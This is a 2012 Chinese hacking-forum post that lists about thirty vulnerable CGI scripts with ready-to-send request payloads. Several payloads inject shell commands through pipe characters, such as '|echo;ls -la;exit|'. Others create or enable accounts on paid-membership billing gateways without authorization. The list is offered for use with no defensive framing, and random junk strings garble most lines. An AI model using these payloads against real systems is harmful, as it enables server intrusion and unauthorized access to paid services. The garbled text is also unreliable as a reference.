找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2609|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
6 M# W4 o, s* {+ L
; [9 X1 r& V4 D% B/ Q; v+ \' ^. _: k" H/smspass.pl4 E- k1 Q& f/ B! C3 a8 T! c3 e5 V9 h
username=username&password=password
* F; l$ r* b0 x) c& ]# i7 d( R' c6 D  g2 w9 |2 a
/index.cgi
4 x2 K/ G' P2 o. f7 Wwei=ren&gen=command3 m0 j! a, b8 Y* l
/ q. f9 \" V" m- E1 W& N  ?
/passmaster.cgi5 Q; t) ~* G2 w9 l9 D2 M0 r
Action=Add&Username=Username&Password=Password
7 f! [9 K$ [- l
. r/ A, U% |, @0 G/accountcreate.cgi
/ V! L( [) @- `: busername=username&password=password&ref1=|echo;ls|
; H" E( Y/ F) \. T9 n
0 P6 r  P1 M6 q; P6 C1 J/form.cgi
+ E; `& ~6 P3 ]6 i- m; aname=xxxx&email=email&subject=xxxx&response=|echo;ls|
% e1 g$ Y2 u% V: j7 K
" l$ p* v  {# J3 F/addusr.pl- p0 h9 X' @6 @" ~" Y+ V4 ^, y, m6 o
/cgi-bin/EuroDebit/addusr.pl; t* {8 K1 |! s+ S& ]# M! o
user=username&pass=Password&confirm=Password
: {# B, m* ^4 }( B7 R( V9 N6 u+ Z6 E9 ^7 Q0 i$ l$ X$ G9 [- J* y$ Y& ~
/ccbill-local.asp3 f* L  }( [8 t/ J
post_values=username:password) t- V, a' |) a, W
, `9 }: S8 p2 F
/count.cgi5 t% y% L8 V  g# d7 p
pinfile=|echo;ls -la;exit|( _, I. f3 [" T- n. J2 k" R2 @
3 j& {! W4 m' K5 b9 N6 w; k
/recon.cgi/ X# k- I3 R" k3 e' V9 |- U$ ?
/recon.cgi?search
" o5 G% J4 Y: M: D- l! G5 Q, osearchoption=1&searchfor=|echo;ls -al;exit|
$ P# h9 w* u, K1 I" u
! z/ x& h: ?  b0 X" @2 ~- Y/verotelrum.pl
9 V- i8 K$ S6 p6 P7 r* e% y  ^vercode=username:password:dseegsow:add:amount<&30>
5 t: y0 ?) a$ ]! Y# o# a! d& |+ j& B$ j' T# C7 `: j1 _
/af.cgi
- \1 {) L2 z" ?* N3 h% l- N_browser_out=|echo;ls -la;exit;|4 W/ L  H; M1 p2 \

2 }/ f2 }+ W8 a+ l. V1 v/modify.cgi" W5 G  Y- P, i( B' D3 @8 E
username=username&password=password&expire=30
' ]3 ]3 Y; q* F) E7 R5 U$ v5 D( M2 P/ c5 m) o& j
/openjournal.cgi6 q+ k( p7 P: R/ |# j/ ?, ~
edit=1&ct=2&go=|echo;ls -al;exit|
, k5 Y5 R! x4 Y3 G+ N! }# s
0 B" j/ w' T9 d8 i: u8 K' d" e/gx9passwd.cgi
. W- N6 Z$ \: {- R* N7 I- \cmd=ADD&user=username&pass=password# D; Q/ A+ @3 K( t3 O
$ K* K9 k# P: d- D7 }5 o
/probecontrol.cgi3 B5 |. J' p9 b' d& f6 _2 v, \
command=enable&username=username&password=password
6 S* @8 s0 F- ?& q+ F, A9 Q5 Q& c1 Z3 P6 [6 ~8 a4 G" `* I
/recon.cgi
: `* s/ C1 P$ Gsearchoption=3&searchfor=echo;ls -la;exit
0 W4 N; W! ]9 i( o) J8 n
. {  k1 D) u; ^# U0 D- @/htadd.pl
. [3 ^9 {; w/ ^configfile=|echo; ls -alt; exit
+ ~; Q" |/ k# C  m' f# X# A6 ~9 Y+ H7 u# I
/gx9passwd.cgi. ~1 Z" Q9 _: g4 [8 I/ b, y
cmd=ADD&user=username&pass=password
! S' p' R3 L7 ]4 f9 e
" Z& C4 o" e% x/ibill*.pl1 I9 H7 T. A5 E; t0 S3 W
reqtype=add&authpwd=authpwd&username=username&password=password
# s5 g5 [; H; H* ~* q6 x: y
5 H9 Y% n8 ^& f' J+ ~% C" ]5 y/ Z& X$ n/cpay.cgi/ H3 t# p9 m, x. w2 \
command=add_member&username=username(EMAIL)&password=password(DES)/ x" j9 E' ~: Q

9 B, L" Z2 l. D- R/globill_ut.cgi
0 L9 a2 C+ X$ ]6 Ldo=add&username=username&password=password&wpassword=password' c" `  r, O( i6 N
3 _  {3 f' M4 H' K8 w
/usercontrol.cgi9 m$ ^: p+ O  n; t, N- s
command=enable&username=USER&password=PASS) w5 \! M% i& o+ Z$ B
- A+ E" ^+ x  L( m
/globoSALErum.cgi
: g/ _9 _$ f! [! K3 @action=ADD&seccode=seccode&login=username&password=password$ D) k. h+ o7 I

" Q/ M1 \. C5 D: l3 K) M' s/addusr.pl
& s) g: h- g7 Q: F& Luser=USER&pass=PASS&confirm=PASS2 w$ P% ~- P# {9 m* ~3 C

+ g# U/ Z2 R5 e/pincount.cgi! N# p- C# A; o$ N
/cgi-bin/mastergate/pincount.cgi  D  f5 N9 p+ v* v0 _* Q1 n
pinfile=|echo;pwd;exit|
7 ?# i2 j1 O6 t0 n' U! x7 p2 J& b% u; ?' w
/accountcreate.cgi1 h: l. C1 O3 Z: U; n# P+ ^
/cgi-bin/gateway/accountcreate.cgi5 K2 z! K% n' P: p' K) O
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
3 W# d- f) e# X2 y& H8 P/ A2 A, u$ q
/af.cgi
% ~4 r  H+ |1 C& q+ S/env.cgi. m/ A/ t: `5 A( y, ?0 P4 w
ADD+;echo;pwd;exit
9 z5 F8 U9 S% ?
* _* f. V" x6 \6 N! c/count.cgi
; o9 c( A+ K  H7 apinfile=|echo;pwd;exit|' D% v( h; T% B7 x" z$ T0 G; o
, ?5 |* g9 k2 g! U- d* L$ N
/recon.cgi9 ]3 S2 q% U$ a. ?1 O
searchoption=1&searchfor=|echo;ls%20-al;exit|$ r% E5 b4 F' A

' V/ Y. _7 P/ I$ f4 g# G/add.cgi# z& h  G+ K: U1 G7 c; s
username=username&password=password&expire=30- O; \) y) v  @2 i$ q
/ T, V# v' ?( M' p; Z  H, u
==============================
. B3 l( C1 a' Z! ^4 q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表